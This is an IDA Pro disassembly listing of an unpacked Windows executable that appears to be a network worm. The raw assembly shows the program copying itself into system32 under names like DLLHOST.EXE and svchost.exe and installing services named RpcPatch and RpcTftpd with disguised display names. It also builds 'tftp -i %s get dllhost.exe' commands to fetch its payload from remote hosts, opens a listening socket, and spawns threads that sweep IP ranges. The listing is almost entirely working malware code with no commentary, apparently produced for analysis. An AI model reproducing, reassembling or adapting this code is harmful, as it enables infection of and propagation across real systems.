;
; +-------------------------------------------------------------------------+
; |	This file is generated by The Interactive Disassembler (IDA)	    |
; |	Copyright (c) 2007 by DataRescue sa/nv,	<ida@datarescue.com>	    |
; | Licensed to: 48-377D-7114-93 SRI International, 1 computer,	std, 11/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; |	This file is generated by The Interactive Disassembler (IDA)	    |
; |	Copyright (c) 2007 by DataRescue sa/nv,	<ida@datarescue.com>	    |
; | Licensed to: 48-377D-7114-93 SRI International, 1 computer,	std, 11/2007 |
; +-------------------------------------------------------------------------+
;
; Input	MD5   :	885C68F5000D5E883573BB339A494908

; File Name   :	u:\work\885c68f5000d5e883573bb339a494908_unpacked.exe
; Format      :	Portable executable for	80386 (PE)
; Imagebase   :	400000
; Section 1. (virtual address 00001000)
; Virtual size			: 00006000 (  24576.)
; Section size in file		: 00006000 (  24576.)
; Offset to raw	data for section: 00001000
; Flags	E0000080: Bss Executable Readable Writable
; Alignment	: default

		include	uni.inc	; see unicode subdir of	ida for	info on	unicode

		.686p
		.mmx
		.model flat

; ===========================================================================

; Segment type:	Pure code
; Segment permissions: Read/Write/Execute
seg000		segment	para public 'CODE' use32
		assume cs:seg000
		;org 401000h
		assume es:nothing, ss:nothing, ds:seg000, fs:nothing, gs:nothing

; =============== S U B	R O U T	I N E =======================================



sub_401000	proc near		; CODE XREF: sub_402A00+Dp

var_230		= dword	ptr -230h
var_22C		= byte ptr -22Ch
var_228		= dword	ptr -228h
var_20C		= byte ptr -20Ch
var_108		= byte ptr -108h
var_107		= byte ptr -107h
arg_0		= dword	ptr  4

		sub	esp, 230h
		push	ebp
		push	esi
		push	edi
		mov	ecx, 41h
		xor	eax, eax
		lea	edi, [esp+23Ch+var_107]
		mov	[esp+23Ch+var_108], 0
		lea	edx, [esp+23Ch+var_108]
		rep stosd
		mov	edi, [esp+23Ch+arg_0]
		or	ecx, 0FFFFFFFFh
		repne scasb
		not	ecx
		sub	edi, ecx
		mov	[esp+23Ch+var_230], 0
		mov	eax, ecx
		mov	esi, edi
		mov	edi, edx
		shr	ecx, 2
		rep movsd
		mov	ecx, eax
		xor	eax, eax
		and	ecx, 3
		push	eax
		rep movsb
		mov	ecx, 49h
		lea	edi, [esp+240h+var_22C]
		rep stosd
		push	2
		call	sub_403134	; CreateToolhelp32Snapshot
		mov	edi, eax
		cmp	edi, 0FFFFFFFFh
		jz	short loc_4010E7
		lea	ecx, [esp+23Ch+var_230]
		mov	[esp+23Ch+var_230], 128h
		push	ecx
		push	edi
		call	sub_40312E	; Process32First
		test	eax, eax
		jz	short loc_4010E0
		mov	esi, dword_404120
		mov	ebp, dword_404140


loc_401091:				; CODE XREF: sub_401000+C9j
		lea	edx, [esp+23Ch+var_20C]
		push	2Eh
		push	edx
		call	esi ; dword_404120
		add	esp, 8
		test	eax, eax
		jz	short loc_4010A4
		mov	byte ptr [eax],	0


loc_4010A4:				; CODE XREF: sub_401000+9Fj
		lea	eax, [esp+23Ch+var_108]
		lea	ecx, [esp+23Ch+var_20C]
		push	eax
		push	ecx
		call	ebp ; dword_404140
		add	esp, 8
		test	eax, eax
		jz	short loc_4010CB
		lea	edx, [esp+23Ch+var_230]
		push	edx
		push	edi
		call	sub_403128	; Process32Next
		test	eax, eax
		jz	short loc_4010E0
		jmp	short loc_401091
; ---------------------------------------------------------------------------


loc_4010CB:				; CODE XREF: sub_401000+B8j
		push	edi
		call	dword_4040E0	; CloseHandle
		mov	eax, [esp+23Ch+var_228]
		pop	edi
		pop	esi
		pop	ebp
		add	esp, 230h
		retn
; ---------------------------------------------------------------------------


loc_4010E0:				; CODE XREF: sub_401000+83j
					; sub_401000+C7j
		push	edi
		call	dword_4040E0	; CloseHandle


loc_4010E7:				; CODE XREF: sub_401000+6Cj
		pop	edi
		pop	esi
		xor	eax, eax
		pop	ebp
		add	esp, 230h
		retn
sub_401000	endp

; ---------------------------------------------------------------------------
		align 10h

; =============== S U B	R O U T	I N E =======================================



sub_401100	proc near		; CODE XREF: sub_401470+38p

var_2		= byte ptr -2
var_1		= byte ptr -1

		push	ecx
		push	ebx
		push	esi
		mov	esi, dword_40413C
		call	esi ; dword_40413C
		cdq
		mov	ecx, 11h
		idiv	ecx
		cmp	edx, 0Eh
		jnz	short loc_40112E
		call	esi ; dword_40413C
		mov	ebx, eax
		and	ebx, 80000003h
		jns	short loc_401129
		dec	ebx
		or	ebx, 0FFFFFFFCh
		inc	ebx


loc_401129:				; CODE XREF: sub_401100+22j
		add	bl, 3Fh
		jmp	short loc_401160
; ---------------------------------------------------------------------------


loc_40112E:				; CODE XREF: sub_401100+16j
		cmp	edx, 0Fh
		jnz	short loc_401144
		call	esi ; dword_40413C
		cdq
		mov	ecx, 2Dh
		idiv	ecx
		mov	ebx, edx
		add	bl, 80h
		jmp	short loc_401160
; ---------------------------------------------------------------------------


loc_401144:				; CODE XREF: sub_401100+31j
		cmp	edx, 10h
		jnz	short loc_40115A
		call	esi ; dword_40413C
		cdq
		mov	ecx, 9
		idiv	ecx
		mov	ebx, edx
		sub	bl, 40h
		jmp	short loc_401160
; ---------------------------------------------------------------------------


loc_40115A:				; CODE XREF: sub_401100+47j
		mov	bl, byte_405BA4[edx]


loc_401160:				; CODE XREF: sub_401100+2Cj
					; sub_401100+42j ...
		call	esi ; dword_40413C
		and	eax, 800000FFh
		jns	short loc_401170
		dec	eax
		or	eax, 0FFFFFF00h
		inc	eax


loc_401170:				; CODE XREF: sub_401100+67j
		mov	[esp+0Ch+var_2], al
		call	esi ; dword_40413C
		and	eax, 800000FFh
		jns	short loc_401184
		dec	eax
		or	eax, 0FFFFFF00h
		inc	eax


loc_401184:				; CODE XREF: sub_401100+7Bj
		mov	[esp+0Ch+var_1], al
		call	esi ; dword_40413C
		and	eax, 800000FFh
		jns	short loc_401198
		dec	eax
		or	eax, 0FFFFFF00h
		inc	eax


loc_401198:				; CODE XREF: sub_401100+8Fj
		xor	edx, edx
		xor	ecx, ecx
		mov	ch, [esp+0Ch+var_1]
		mov	dh, bl
		mov	dl, [esp+0Ch+var_2]
		and	eax, 0FFh
		shl	edx, 10h
		or	eax, edx
		and	ecx, 0FFFFh
		pop	esi
		or	eax, ecx
		pop	ebx
		pop	ecx
		retn
sub_401100	endp

; ---------------------------------------------------------------------------
		align 10h

; =============== S U B	R O U T	I N E =======================================



sub_4011C0	proc near		; CODE XREF: seg000:004030AAp

arg_0		= dword	ptr  4
arg_4		= dword	ptr  8

		call	dword_4040CC	; FreeConsole
		call	sub_4027B0
		test	eax, eax
		jnz	short locret_4011FB
		push	104h
		push	offset aCWindowsSystem ; "C:\\WINDOWS\\system32"
		call	dword_4040D0	; GetSystemDirectoryA
		call	sub_402730
		sub	eax, 2
		jz	short loc_4011FC
		mov	eax, [esp+arg_4]
		mov	ecx, [esp+arg_0]
		push	eax
		push	ecx
		call	sub_4016D0
		add	esp, 8

locret_4011FB:				; CODE XREF: sub_4011C0+Dj
		retn
; ---------------------------------------------------------------------------


loc_4011FC:				; CODE XREF: sub_4011C0+27j
		jmp	sub_4027E0
sub_4011C0	endp

; ---------------------------------------------------------------------------
		align 10h

; =============== S U B	R O U T	I N E =======================================



sub_401210	proc near		; CODE XREF: sub_401280+AFp
					; sub_401280:loc_4013B1p ...
		push	esi
		mov	esi, dword_4040C8


loc_401217:				; CODE XREF: sub_401210+27j
		call	sub_401E80
		test	eax, eax
		jnz	short loc_401230


loc_401220:				; CODE XREF: sub_401210+1Ej
		push	927C0h
		call	esi ; dword_4040C8
		call	sub_401E80
		test	eax, eax
		jz	short loc_401220


loc_401230:				; CODE XREF: sub_401210+Ej
		call	sub_401EA0
		test	eax, eax
		jz	short loc_401217
		mov	esi, dword_40411C
		push	offset dword_407478
		push	offset aTftpISGetDllho ; "tftp -i %s get dllhost.exe wins\\DLLHOST"...
		push	offset dword_4075A8
		call	esi ; dword_40411C
		add	esp, 0Ch
		push	offset dword_407478
		push	offset aTftpISGetSvcho ; "tftp -i %s get svchost.exe wins\\SVCHOST"...
		push	offset dword_407628
		call	esi ; dword_40411C
		add	esp, 0Ch
		call	sub_4020E0
		call	sub_402130
		pop	esi
		retn
sub_401210	endp

; ---------------------------------------------------------------------------
		align 10h

; =============== S U B	R O U T	I N E =======================================



sub_401280	proc near		; CODE XREF: sub_4016D0+Aj
					; seg000:0040294Fp

var_1A0		= word ptr -1A0h
var_194		= byte ptr -194h
var_190		= byte ptr -190h

		sub	esp, 1A4h
		lea	eax, [esp+1A4h+var_190]
		push	eax
		push	202h
		call	dword_40418C	; WSAStartup
		test	eax, eax
		jnz	loc_401359
		call	sub_402A00
		lea	ecx, [esp+1A4h+var_1A0]
		push	ecx
		call	dword_4040B8	; GetLocalTime
		cmp	[esp+1A4h+var_1A0], 7D4h
		jnz	short loc_4012DB
		push	offset aRpcpatch ; "RpcPatch"
		call	sub_402F00
		push	offset aRpctftpd ; "RpcTftpd"
		call	sub_402F00
		add	esp, 8
		call	sub_402970
		push	1
		call	dword_4040BC	; ExitProcess


loc_4012DB:				; CODE XREF: sub_401280+35j
		push	ebx
		push	ebp
		push	esi
		push	edi
		call	dword_4040C0	; GetTickCount
		push	eax
		call	dword_404104	; srand
		mov	esi, dword_4040C8
		mov	ecx, 10h
		mov	eax, 0AAAAAAAAh
		mov	edi, offset dword_406430
		add	esp, 4
		rep stosd


loc_401306:				; CODE XREF: sub_401280+A3j
		push	109A0h
		call	sub_402FC0
		add	esp, 4
		mov	ds:dword_4075A0, eax
		push	64h
		call	esi ; dword_4040C8
		mov	eax, ds:dword_4075A0
		test	eax, eax
		jz	short loc_401306
		call	sub_401F30
		call	sub_402170
		call	sub_401210
		call	sub_401780
		lea	edx, [esp+1A4h+var_194]
		push	edx
		push	0
		push	0
		push	offset sub_401990
		push	0
		push	0
		call	dword_4040C4	; CreateThread
		test	eax, eax
		jnz	short loc_401360
		pop	edi
		pop	esi
		pop	ebp
		pop	ebx


loc_401359:				; CODE XREF: sub_401280+18j
		add	esp, 1A4h
		retn
; ---------------------------------------------------------------------------


loc_401360:				; CODE XREF: sub_401280+D3j
		push	eax
		call	dword_4040E0	; CloseHandle
		push	offset aRpctftpd ; "RpcTftpd"
		call	sub_402540
		add	esp, 4
		test	eax, eax
		jnz	short loc_401398
		push	3E8h
		call	esi ; dword_4040C8
		call	sub_4015E0
		push	3E8h
		call	esi ; dword_4040C8
		push	offset aRpctftpd ; "RpcTftpd"
		call	sub_402540
		add	esp, 4


loc_401398:				; CODE XREF: sub_401280+F6j
		push	7D0h
		call	esi ; dword_4040C8
		mov	ebx, dword_404190
		mov	ebp, dword_404194
		mov	edi, dword_40413C


loc_4013B1:				; CODE XREF: sub_401280+1DEj
		call	sub_401210
		push	offset dword_407478
		call	ebp ; dword_404194
		push	eax
		call	ebx ; dword_404190
		mov	esi, eax
		push	0
		and	esi, 0FFFF0000h
		push	0
		push	1
		push	esi
		call	sub_401470
		add	esp, 10h
		call	sub_401210
		call	edi ; dword_40413C
		and	eax, 80000001h
		jns	short loc_4013EA
		dec	eax
		or	eax, 0FFFFFFFEh
		inc	eax


loc_4013EA:				; CODE XREF: sub_401280+163j
		jz	short loc_4013F4
		add	esi, 10000h
		jmp	short loc_4013FA
; ---------------------------------------------------------------------------


loc_4013F4:				; CODE XREF: sub_401280:loc_4013EAj
		sub	esi, 30000h


loc_4013FA:				; CODE XREF: sub_401280+172j
		push	0
		push	0
		push	3
		push	esi
		call	sub_401470
		call	sub_401210
		call	edi ; dword_40413C
		cdq
		mov	ecx, 4Ch
		xor	esi, esi
		idiv	ecx
		push	1
		push	0
		push	1
		mov	si, word_40537C[edx*2]
		shl	esi, 10h
		push	esi
		call	sub_401470
		add	esp, 20h
		call	sub_401210
		call	edi ; dword_40413C
		and	eax, 80000001h
		jns	short loc_401444
		dec	eax
		or	eax, 0FFFFFFFEh
		inc	eax


loc_401444:				; CODE XREF: sub_401280+1BDj
		jz	short loc_40144A
		push	0
		jmp	short loc_40144C
; ---------------------------------------------------------------------------


loc_40144A:				; CODE XREF: sub_401280:loc_401444j
		push	1


loc_40144C:				; CODE XREF: sub_401280+1C8j
		push	1
		push	1
		push	esi
		call	sub_401470
		add	esp, 10h
		call	sub_402A00
		jmp	loc_4013B1
sub_401280	endp

; ---------------------------------------------------------------------------
		align 10h

; =============== S U B	R O U T	I N E =======================================



sub_401470	proc near		; CODE XREF: sub_401280+14Fp
					; sub_401280+181p ...

var_C		= dword	ptr -0Ch
var_8		= dword	ptr -8
var_4		= dword	ptr -4
arg_0		= dword	ptr  4
arg_4		= dword	ptr  8
arg_8		= dword	ptr  0Ch
arg_C		= dword	ptr  10h

		sub	esp, 0Ch
		push	ebx
		push	ebp
		mov	ebp, dword_4040C8
		push	esi
		mov	esi, [esp+18h+arg_4]
		push	edi
		shl	esi, 10h
		xor	edi, edi
		xor	ebx, ebx
		test	esi, esi
		mov	[esp+1Ch+var_8], 1
		mov	[esp+1Ch+var_C], ebx
		mov	[esp+1Ch+var_4], esi
		jle	loc_4015C7


loc_4014A0:				; CODE XREF: sub_401470+151j
		mov	eax, [esp+1Ch+arg_8]
		test	eax, eax
		jz	short loc_4014B1
		call	sub_401100
		mov	ebx, eax
		jmp	short loc_4014B7
; ---------------------------------------------------------------------------


loc_4014B1:				; CODE XREF: sub_401470+36j
		mov	eax, [esp+1Ch+arg_0]
		add	ebx, eax


loc_4014B7:				; CODE XREF: sub_401470+3Fj
		cmp	bl, 0C5h
		jz	loc_4015B6
		mov	ecx, ebx
		shr	ecx, 8
		cmp	cl, 0C5h
		jz	loc_4015B6
		mov	eax, ebx
		shr	eax, 10h
		cmp	al, 0C5h
		jz	loc_4015B6
		mov	edx, ebx
		shr	edx, 18h
		cmp	dl, 0C5h
		jz	loc_4015B6
		cmp	bx, 9999h
		jz	loc_4015B6
		cmp	cx, 9999h
		jz	loc_4015B6
		cmp	ax, 9999h
		jz	loc_4015B6
		push	4
		call	sub_402FC0
		mov	esi, eax
		add	esp, 4
		test	esi, esi
		jnz	short loc_40152D
		push	64h
		call	ebp ; dword_4040C8
		push	4
		call	sub_402FC0
		mov	esi, eax
		add	esp, 4
		test	esi, esi
		jz	short loc_401575


loc_40152D:				; CODE XREF: sub_401470+A7j
		test	edi, edi
		jz	short loc_401538
		push	edi
		call	dword_4040E0	; CloseHandle


loc_401538:				; CODE XREF: sub_401470+BFj
		push	ebx
		call	dword_404188	; ntohl
		mov	[esi], eax
		mov	eax, [esp+1Ch+arg_C]
		test	eax, eax
		jz	short loc_401558
		lea	eax, [esp+1Ch+arg_4]
		push	eax
		push	0
		push	esi
		push	offset sub_402C40
		jmp	short loc_401565
; ---------------------------------------------------------------------------


loc_401558:				; CODE XREF: sub_401470+D7j
		lea	ecx, [esp+1Ch+arg_4]
		push	ecx
		push	0
		push	esi
		push	offset sub_402B20


loc_401565:				; CODE XREF: sub_401470+E6j
		push	0
		push	0
		call	dword_4040C4	; CreateThread
		push	2
		mov	edi, eax
		call	ebp ; dword_4040C8


loc_401575:				; CODE XREF: sub_401470+BBj
		mov	eax, [esp+1Ch+var_8]
		test	eax, eax
		jz	short loc_401596
		cmp	[esp+1Ch+var_C], 12Ch
		jl	short loc_401596
		push	7D0h
		call	ebp ; dword_4040C8
		mov	[esp+1Ch+var_8], 0


loc_401596:				; CODE XREF: sub_401470+10Bj
					; sub_401470+115j
		cmp	ds:dword_4075A4, 12Ch
		jl	short loc_4015B2


loc_4015A2:				; CODE XREF: sub_401470+140j
		push	2
		call	ebp ; dword_4040C8
		cmp	ds:dword_4075A4, 12Ch
		jge	short loc_4015A2


loc_4015B2:				; CODE XREF: sub_401470+130j
		mov	esi, [esp+1Ch+var_4]


loc_4015B6:				; CODE XREF: sub_401470+4Aj
					; sub_401470+58j ...
		mov	ebx, [esp+1Ch+var_C]
		inc	ebx
		cmp	ebx, esi
		mov	[esp+1Ch+var_C], ebx
		jl	loc_4014A0


loc_4015C7:				; CODE XREF: sub_401470+2Aj
		push	0EA60h
		call	ebp ; dword_4040C8
		pop	edi
		pop	esi
		pop	ebp
		pop	ebx
		add	esp, 0Ch
		retn
sub_401470	endp

; ---------------------------------------------------------------------------
		align 10h

; =============== S U B	R O U T	I N E =======================================



sub_4015E0	proc near		; CODE XREF: sub_401280+FFp
					; sub_4016D0p

var_208		= byte ptr -208h
var_104		= byte ptr -104h

		sub	esp, 208h
		lea	eax, [esp+208h+var_104]
		push	esi
		mov	esi, dword_40411C
		push	offset aCWindowsSystem ; "C:\\WINDOWS\\system32"
		push	offset aSDllcacheTftpd ; "%s\\dllcache\\tftpd.exe"
		push	eax
		call	esi ; dword_40411C
		add	esp, 0Ch
		lea	ecx, [esp+20Ch+var_208]
		push	offset aCWindowsSystem ; "C:\\WINDOWS\\system32"
		push	offset aSWinsSvchost_e ; "%s\\wins\\svchost.exe"
		push	ecx
		call	esi ; dword_40411C
		add	esp, 0Ch
		lea	edx, [esp+20Ch+var_208]
		lea	eax, [esp+20Ch+var_104]
		push	0
		push	edx
		push	eax
		call	dword_4040B4	; CopyFileA
		push	offset aMsdtc	; "MSDTC"
		push	offset aSvchost_exe ; "svchost.exe"
		push	offset aNetworkConnect ; "Network Connections Sharing"
		push	offset aRpctftpd ; "RpcTftpd"
		call	sub_4023E0
		add	esp, 10h
		pop	esi
		add	esp, 208h
		retn
sub_4015E0	endp

; ---------------------------------------------------------------------------
		align 10h

; =============== S U B	R O U T	I N E =======================================



sub_401660	proc near		; CODE XREF: sub_4016D0+5p

var_20C		= byte ptr -20Ch
var_108		= byte ptr -108h

		sub	esp, 20Ch
		lea	eax, [esp+20Ch+var_108]
		push	104h
		push	eax
		push	0
		call	dword_4040A8	; GetModuleFileNameA
		push	offset aCWindowsSystem ; "C:\\WINDOWS\\system32"
		lea	ecx, [esp+210h+var_20C]
		push	offset aSWinsDllhost_e ; "%s\\wins\\DLLHOST.EXE"
		push	ecx
		call	dword_40411C	; sprintf
		add	esp, 0Ch
		lea	edx, [esp+20Ch+var_20C]
		lea	eax, [esp+20Ch+var_108]
		push	0
		push	edx
		push	eax
		call	dword_4040B4	; CopyFileA
		push	offset aBrowser	; "Browser"
		push	offset aDllhost_exe ; "DLLHOST.EXE"
		push	offset aWinsClient ; "WINS Client"
		push	offset aRpcpatch ; "RpcPatch"
		call	sub_4023E0
		add	esp, 21Ch
		retn
sub_401660	endp

; ---------------------------------------------------------------------------
		align 10h

; =============== S U B	R O U T	I N E =======================================



sub_4016D0	proc near		; CODE XREF: sub_4011C0+33p
		call	sub_4015E0
		call	sub_401660
		jmp	sub_401280
sub_4016D0	endp

; ---------------------------------------------------------------------------
		align 10h

; =============== S U B	R O U T	I N E =======================================



sub_4016E0	proc near		; CODE XREF: sub_401780:loc_4018BCp

arg_0		= dword	ptr  4
arg_4		= dword	ptr  8

		mov	eax, [esp+arg_0]
		mov	ecx, [esp+arg_4]
		push	0
		push	0
		push	eax
		push	ecx
		push	0
		call	sub_403110
		neg	eax
		sbb	eax, eax
		inc	eax
		retn
sub_4016E0	endp

; ---------------------------------------------------------------------------
		align 10h

; =============== S U B	R O U T	I N E =======================================



sub_401700	proc near		; CODE XREF: sub_401780+16Dp

var_54		= dword	ptr -54h
var_44		= dword	ptr -44h
var_40		= dword	ptr -40h
var_3C		= dword	ptr -3Ch
var_38		= dword	ptr -38h
var_34		= dword	ptr -34h
var_30		= dword	ptr -30h
var_2C		= dword	ptr -2Ch
var_28		= dword	ptr -28h
var_18		= dword	ptr -18h
var_14		= word ptr -14h
var_12		= word ptr -12h
var_10		= dword	ptr -10h
arg_0		= dword	ptr  4

		sub	esp, 54h
		push	edi
		mov	ecx, 11h
		xor	eax, eax
		lea	edi, [esp+58h+var_44]
		rep stosd
		lea	ecx, [esp+58h+var_54]
		lea	edx, [esp+58h+var_44]
		push	ecx
		mov	ecx, [esp+5Ch+arg_0]
		push	edx
		push	eax
		push	eax
		push	eax
		push	eax
		push	eax
		push	eax
		push	ecx
		push	eax
		mov	[esp+80h+var_44], 44h
		mov	[esp+80h+var_40], eax
		mov	[esp+80h+var_38], eax
		mov	[esp+80h+var_3C], eax
		mov	[esp+80h+var_28], eax
		mov	[esp+80h+var_2C], eax
		mov	[esp+80h+var_30], eax
		mov	[esp+80h+var_34], eax
		mov	[esp+80h+var_14], ax
		mov	[esp+80h+var_10], eax
		mov	[esp+80h+var_12], ax
		mov	[esp+80h+var_18], 1
		call	dword_4040E4	; CreateProcessA
		mov	ecx, [esp+58h+var_54]
		pop	edi
		neg	eax
		sbb	eax, eax
		and	eax, ecx
		add	esp, 54h
		retn
sub_401700	endp

; ---------------------------------------------------------------------------
		align 10h

; =============== S U B	R O U T	I N E =======================================



sub_401780	proc near		; CODE XREF: sub_401280+B4p

var_C8		= dword	ptr -0C8h
var_C4		= dword	ptr -0C4h
var_C0		= dword	ptr -0C0h
var_BC		= dword	ptr -0BCh
var_B8		= word ptr -0B8h
var_B6		= byte ptr -0B6h
var_B4		= byte ptr -0B4h

		sub	esp, 0C8h
		push	esi
		push	edi
		call	sub_402310
		mov	edi, eax
		test	edi, edi
		jz	short loc_40179C
		cmp	edi, 1
		jnz	loc_4018C8


loc_40179C:				; CODE XREF: sub_401780+11j
		push	edi
		call	sub_402390
		add	esp, 4
		test	eax, eax
		jnz	loc_4018C8
		call	dword_4040A0	; GetOEMCP
		mov	esi, eax
		call	dword_4040A4	; GetSystemDefaultLCID
		mov	ecx, eax
		and	ecx, 3FFh
		shr	ax, 0Ah
		cmp	esi, 1B5h
		jnz	short loc_4017E7
		cmp	cx, 9
		jnz	loc_40192F
		cmp	ax, 1
		jnz	loc_40192F
		xor	eax, eax
		jmp	short loc_40185E
; ---------------------------------------------------------------------------


loc_4017E7:				; CODE XREF: sub_401780+4Dj
		cmp	esi, 3A8h
		jnz	short loc_40180A
		cmp	cx, 4
		jnz	loc_40192F
		cmp	ax, 2
		jnz	loc_40192F
		mov	eax, 1
		jmp	short loc_40185E
; ---------------------------------------------------------------------------


loc_40180A:				; CODE XREF: sub_401780+6Dj
		cmp	esi, 3B6h
		jnz	short loc_40182D
		cmp	cx, 4
		jnz	loc_40192F
		cmp	ax, 1
		jnz	loc_40192F
		mov	eax, 2
		jmp	short loc_40185E
; ---------------------------------------------------------------------------


loc_40182D:				; CODE XREF: sub_401780+90j
		cmp	esi, 3A4h
		jz	loc_40192F
		cmp	esi, 3B5h
		jnz	loc_40192F
		cmp	cx, 12h
		jnz	loc_40192F
		cmp	ax, 1
		jnz	loc_40192F
		mov	eax, 3


loc_40185E:				; CODE XREF: sub_401780+65j
					; sub_401780+88j ...
		mov	ecx, dword_4061A8
		mov	edx, dword_4061AC
		mov	[esp+0D0h+var_C8], ecx
		mov	ecx, dword_4061B0
		mov	[esp+0D0h+var_C4], edx
		mov	edx, dword_4061B4
		mov	[esp+0D0h+var_C0], ecx
		mov	cx, word_4061B8
		mov	[esp+0D0h+var_BC], edx
		mov	dl, byte_4061BA
		test	edi, edi
		mov	[esp+0D0h+var_B8], cx
		mov	[esp+0D0h+var_B6], dl
		jnz	short loc_4018AF
		mov	eax, off_405424[eax*4]
		lea	ecx, [esp+0D0h+var_C8]
		push	eax
		push	ecx
		jmp	short loc_4018BC
; ---------------------------------------------------------------------------


loc_4018AF:				; CODE XREF: sub_401780+11Ej
		mov	edx, off_405414[eax*4]
		lea	eax, [esp+0D0h+var_C8]
		push	edx
		push	eax


loc_4018BC:				; CODE XREF: sub_401780+12Dj
		call	sub_4016E0
		add	esp, 8
		test	eax, eax
		jnz	short loc_4018D3


loc_4018C8:				; CODE XREF: sub_401780+16j
					; sub_401780+27j
		pop	edi
		xor	eax, eax
		pop	esi
		add	esp, 0C8h
		retn
; ---------------------------------------------------------------------------


loc_4018D3:				; CODE XREF: sub_401780+146j
		lea	ecx, [esp+0D0h+var_C8]
		lea	edx, [esp+0D0h+var_B4]
		push	ecx
		push	offset aSNOZQ	; "%s -n -o -z -q"
		push	edx
		call	dword_40411C	; sprintf
		lea	eax, [esp+0DCh+var_B4]
		push	eax
		call	sub_401700
		mov	esi, eax
		add	esp, 10h
		test	esi, esi
		jnz	short loc_401904
		pop	edi
		pop	esi
		add	esp, 0C8h
		retn
; ---------------------------------------------------------------------------


loc_401904:				; CODE XREF: sub_401780+179j
		push	57E40h
		push	esi
		call	dword_4040B0	; WaitForSingleObject
		test	eax, eax
		jz	short loc_40193A
		push	1
		push	esi
		call	dword_4040AC	; TerminateProcess
		push	esi
		call	dword_4040E0	; CloseHandle
		lea	ecx, [esp+0D0h+var_C8]
		push	ecx
		call	dword_4040E8	; DeleteFileA


loc_40192F:				; CODE XREF: sub_401780+53j
					; sub_401780+5Dj ...
		pop	edi
		xor	eax, eax
		pop	esi
		add	esp, 0C8h
		retn
; ---------------------------------------------------------------------------


loc_40193A:				; CODE XREF: sub_401780+192j
		push	esi
		call	dword_4040E0	; CloseHandle
		mov	esi, dword_4040C8
		push	3A98h
		call	esi ; dword_4040C8
		lea	edx, [esp+0D0h+var_C8]
		push	edx
		call	dword_4040E8	; DeleteFileA
		push	edi
		call	sub_402390
		add	esp, 4
		test	eax, eax
		jz	short loc_401977
		push	2
		call	sub_4022A0
		add	esp, 4
		push	4E20h
		call	esi ; dword_4040C8


loc_401977:				; CODE XREF: sub_401780+1E4j
		pop	edi
		mov	eax, 1
		pop	esi
		add	esp, 0C8h
		retn
sub_401780	endp

; ---------------------------------------------------------------------------
		align 10h

; =============== S U B	R O U T	I N E =======================================



sub_401990	proc near		; DATA XREF: sub_401280+C2o

var_28		= dword	ptr -28h
var_24		= byte ptr -24h
var_20		= word ptr -20h
var_1E		= word ptr -1Eh
var_1C		= dword	ptr -1Ch
var_10		= byte ptr -10h

		sub	esp, 28h
		push	ebx
		push	ebp
		push	esi
		push	edi
		push	0
		push	1
		push	2
		call	dword_404150	; socket
		mov	edi, eax
		cmp	edi, 0FFFFFFFFh
		jz	loc_401AFA
		push	0
		call	dword_404188	; ntohl
		mov	[esp+38h+var_20], 2
		mov	[esp+38h+var_1C], eax
		call	dword_40413C	; rand
		cdq
		mov	ecx, 64h
		mov	ebx, dword_404174
		idiv	ecx
		mov	ebp, dword_404178
		add	edx, 29Ah
		xor	esi, esi


loc_4019E3:				; CODE XREF: sub_401990+8Fj
		add	dx, si
		xor	eax, eax
		mov	al, dh
		mov	word_405B68, dx
		cmp	al, 0C5h
		jz	short loc_401A18
		cmp	dl, 0C5h
		jz	short loc_401A18
		push	edx
		call	ebx ; dword_404174
		lea	ecx, [esp+38h+var_20]
		push	10h
		push	ecx
		push	edi
		mov	[esp+44h+var_1E], ax
		call	ebp ; dword_404178
		cmp	eax, 0FFFFFFFFh
		jnz	short loc_401A21
		mov	dx, word_405B68


loc_401A18:				; CODE XREF: sub_401990+63j
					; sub_401990+68j
		inc	esi
		cmp	esi, 3E8h
		jl	short loc_4019E3


loc_401A21:				; CODE XREF: sub_401990+7Fj
		cmp	esi, 3E8h
		jnz	short loc_401A37
		call	dword_40417C	; WSACleanup
		push	1
		call	dword_4040BC	; ExitProcess


loc_401A37:				; CODE XREF: sub_401990+97j
		push	7D0h
		push	edi
		call	dword_404180	; listen
		cmp	eax, 0FFFFFFFFh
		jz	loc_401AF3
		lea	edx, [esp+38h+var_28]
		lea	eax, [esp+38h+var_10]
		push	edx
		push	eax
		push	edi
		mov	[esp+44h+var_28], 10h
		call	dword_404184	; accept
		mov	esi, eax
		cmp	esi, 0FFFFFFFFh
		jz	loc_401AF3
		mov	ebp, dword_4040C8
		mov	ebx, dword_4040C4


loc_401A7C:				; CODE XREF: sub_401990+142j
		push	4
		call	sub_402FC0
		add	esp, 4
		test	eax, eax
		jnz	short loc_401A9C
		push	0Ah
		call	ebp ; dword_4040C8
		push	4
		call	sub_402FC0
		add	esp, 4
		test	eax, eax
		jz	short loc_401ABC


loc_401A9C:				; CODE XREF: sub_401990+F8j
		lea	ecx, [esp+38h+var_24]
		mov	[eax], esi
		push	ecx
		push	0
		push	eax
		push	offset sub_401C80
		push	0
		push	0
		call	ebx ; dword_4040C4
		test	eax, eax
		jz	short loc_401AE7
		push	eax
		call	dword_4040E0	; CloseHandle


loc_401ABC:				; CODE XREF: sub_401990+10Aj
		lea	edx, [esp+38h+var_28]
		lea	eax, [esp+38h+var_10]
		push	edx
		push	eax
		push	edi
		call	dword_404184	; accept
		mov	esi, eax
		cmp	esi, 0FFFFFFFFh
		jnz	short loc_401A7C
		push	edi
		call	dword_404170	; closesocket
		pop	edi
		pop	esi
		pop	ebp
		xor	eax, eax
		pop	ebx
		add	esp, 28h
		retn	4
; ---------------------------------------------------------------------------


loc_401AE7:				; CODE XREF: sub_401990+123j
		cmp	esi, 0FFFFFFFFh
		jz	short loc_401AF3
		push	esi
		call	dword_404170	; closesocket


loc_401AF3:				; CODE XREF: sub_401990+B6j
					; sub_401990+DAj ...
		push	edi
		call	dword_404170	; closesocket


loc_401AFA:				; CODE XREF: sub_401990+18j
		pop	edi
		pop	esi
		pop	ebp
		xor	eax, eax
		pop	ebx
		add	esp, 28h
		retn	4
sub_401990	endp

; ---------------------------------------------------------------------------
		align 10h

; =============== S U B	R O U T	I N E =======================================



sub_401B10	proc near		; CODE XREF: sub_401C80+D8p
					; sub_401C80+121p ...

arg_0		= dword	ptr  4
arg_4		= dword	ptr  8
arg_8		= dword	ptr  0Ch

		mov	edx, [esp+arg_4]
		push	ebx
		push	ebp
		push	esi
		push	edi
		mov	edi, edx
		or	ecx, 0FFFFFFFFh
		xor	eax, eax
		repne scasb
		mov	edi, [esp+10h+arg_0]
		push	0
		not	ecx
		dec	ecx
		push	ecx
		push	edx
		push	edi
		call	dword_404168	; send
		test	eax, eax
		jnz	short loc_401B3C
		pop	edi
		pop	esi
